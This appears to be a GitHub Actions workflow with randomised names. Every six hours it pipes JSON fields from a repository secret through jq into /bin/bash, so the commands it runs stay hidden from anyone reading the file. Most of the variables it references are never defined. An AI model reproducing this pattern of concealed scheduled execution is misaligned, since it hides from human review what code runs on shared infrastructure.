name: huangjiao2314
on:
  workflow_dispatch:
  schedule:
    - cron: '26 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huangjiao2314
        env:
          s71: ${{ secrets.s71 }}
        run: |
          echo $s71 | jq -r .dyw48 | /bin/bash
          echo $ob25 | jq -r .vrrej953 | /bin/bash
          echo $m7 | jq -r .obdy694 | /bin/bash
          echo $eaf55 | jq -r .mfn248 | /bin/bash
          echo $lw61557 | jq -r .o325 | /bin/bash
          echo $fnx2 | jq -r .hm1 | /bin/bash

